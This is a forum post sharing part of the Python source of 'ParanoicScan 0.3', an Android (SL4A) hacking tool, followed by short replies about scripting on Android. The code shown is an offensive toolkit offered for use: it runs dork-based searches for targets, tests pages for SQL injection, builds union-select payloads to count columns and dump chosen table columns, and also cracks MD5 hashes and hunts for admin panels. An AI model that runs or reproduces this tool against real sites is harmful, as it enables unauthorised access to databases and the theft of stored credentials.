op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==6 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
aplicacion.dialogShow()
don = more(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==7 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
tabla = ref['value']
aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
columna1 = ref['value']
aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
columna2 = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
aplicacion.dialogShow()
don = dumper(webvul,tabla,columna1,columna2)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==8:
menu()
def menu():
aplicacion.dialogCreateAlert("ParanoicScan 0.3 (C) Doddy Hackman 2014")
aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
aplicacion.dialogShow()
re = aplicacion.dialogGetResponse().result
re2 = re["item"]
if re2==0:
aplicacion.dialogCreateAlert("BingHack Tool")
aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
dork = ref['value']
aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
paginas = ref['value']
paginas = str(paginas)
aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
aplicacion.dialogShow()
founds = ""
rez = ""
rtafinal = ""
founds = bingscan(dork,paginas)
aplicacion.dialogDismiss()
aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
aplicacion.dialogShow()
rez = sqltest(founds)
if len(rez) == 0 :
rtafinal = "[-] Not Found"
else :
rtafinal = "[++] Pages Founds\n\n"
rtafinal = rtafinal + rez
rtafinal = rtafinal + "\n[++] Finished\n"
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==1 :
global webvul
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
web = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
aplicacion.dialogShow()
pass1,pass2 = bypass("--")
code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
if not code==codedos:
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
pass1,pass2 = bypass("--")
rtacondata = ""
control_sql = 0
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
aplicacion.dialogShow()
number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
for te in range(2,30):
number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
if(regexver(code)):
numbers = regexdar(code)
control_sql = 1
rtacondata = rtacondata + "[+] Column length : "+str(te)
rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"
sql = ""
tex = te + 1
for sqlix in range(2,tex):
sql = str(sql)+","+str(sqlix)
sqli = str(1)+sql
sqla = reem(sqli,numbers[0])
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
menusql()
if control_sql==0:
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
aplicacion.exit()
else:
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
aplicacion.exit()
if re2==2 :
aplicacion.dialogCreateAlert("MD5 Cracker")
aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
aplicacion.dialogShow()
don = crackmd5(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("MD5 Cracker",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==3 :
aplicacion.dialogCreateAlert("Admin Finder")
aplicacion.dialogGetInput("Admin Finder","Enter Target")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
aplicacion.dialogShow()
don = scanpanel(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Admin Finder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==4 :
aplicacion.dialogCreateAlert("LocateIP")
aplicacion.dialogGetInput("LocateIP","Enter Target")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
aplicacion.dialogShow()
don = locateip(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("LocateIP",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==5 :
aplicacion.dialogCreateAlert("HTTP FingerPrinting")
aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
aplicacion.dialogShow()
don = httpfinger(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==6 :
menuencoder()
if re2==7 :
about = "This program was written by Doddy Hackman in the summer of 2014"
aplicacion.dialogCreateAlert("About",about)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==8 :
aplicacion.exit()
menu()
# The End ?
The code is here (https://sourceforge.net/projects/paranoicscan/?source=directory)
-
I see you ported it to android. Personally i have never programmed python for android but am sure it won't be too different from the usual syntax.
Thanks for the share.
P.S. Just for the large python fan base, you could go ahead and write a tutorial about programming python for android.
-
derp python fo' roids
Actually Python isn't the only language that can be run on Android. There is this thing called SL4A (Scripting Layer for Android), which lets you run scripts on android in few languages, I think Perl and Ruby.
Coding with that framework is not hard at all and you can do it on the phone as well...
-
Actually Python isn't the only language that can be run on Android. There is this thing called SL4A (Scripting Layer for Android), which lets you run scripts on android in few languages, I think Perl and Ruby.
Coding with that framework is not hard at all and you can do it on the phone as well...
Amazing. You mean i can bring all the power of code to my android. I think i am gonna land that on my TODO list.